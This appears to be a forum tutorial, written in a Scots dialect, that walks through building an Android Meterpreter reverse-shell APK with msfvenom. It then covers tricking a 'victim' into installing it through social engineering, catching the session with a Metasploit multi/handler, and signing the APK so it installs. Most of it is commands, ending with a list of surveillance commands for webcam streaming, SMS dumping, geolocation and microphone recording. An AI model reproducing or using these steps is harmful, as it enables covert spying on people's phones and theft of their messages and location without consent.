1. Furst, tae ken yer LHOST, open up a terminal in Kali Linux an' type "ifconfig"
2. Noo, open up a new command terminal an' set yer payload an' create a custom windows executable:
Code: Select all
root@kali:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=(yer LHOST IP "192.168...")
LPORT=(yer LPORT "1111") R > Android.apk
3. Yer apk file's bein' saved in the Home folder.
4. Now, ye'll want tae transfer or email that APK file tae the victim's phone an' wait for them tae install it. Fur this, ye'll need tae work on yer Social Engineerin' skills.
5. Start up the Metasploit framework console
Code: Select all
msfconsole
6. Richt, noo's the time tae open an' set up the multi-handler. Follow the steps ane by ane, in order:
Code: Select all
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168...
msf exploit(handler) > set LPORT 1111
msf exploit(handler) > exploit
The payload handler's bein' started up.
7. Whun the victim clicks on the app on their phone, the meterpreter session will be established, exploit commands:
- webcam_stream
- dump_sms
- geolocate
- webcam_snap
- record_mic
- dump_sms
SOLUTIONS TO ERRORS:
a. Type this command:
Code: Select all
d2j-apk-sign andro.apk
OR
b. Open up the "Signapk" folder an' then open the command prompt.
Copy the APK ye made intae the Signapk folder.
Then, type in the command prompt:
Code: Select all
jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk
Finally, copy that app tae yer phone an' install it.